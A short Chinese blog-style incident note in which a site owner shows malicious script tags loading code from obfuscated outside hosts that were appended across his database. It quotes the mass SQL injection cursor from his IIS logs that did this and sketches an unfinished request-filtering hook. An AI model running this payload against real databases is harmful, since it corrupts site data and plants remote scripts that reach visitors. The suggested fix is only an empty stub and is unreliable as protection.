"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr
数据库中很多内容都被追加了上段代码,查看IIS日志后发现是SQL注入,大致如下:
declare table_cursor cursor
for
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0)
begin
exec('update ['+@t+'] set ['+@c+']=['+@c+']+cast(0x223e3c2f7469746c653e3c736372697074207372633d687474703a2f2f2536362537352536332536422537352537352532452537352537332f312e6a733e3c2f7363726970743e3c212d2d as varchar(67))')
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor;
唉~~~,还是以前粗心忘记了加上SQL注入校验。
.net里面的global.asax里面,可以做这个处理加上
protected void Application_BeginRequest(Object sender, EventArgs e)
{
StartProcessRequest();
}
public void StartProcessRequest()
{
//对Request.QueryString和Request.Form进行sql关键字校验
}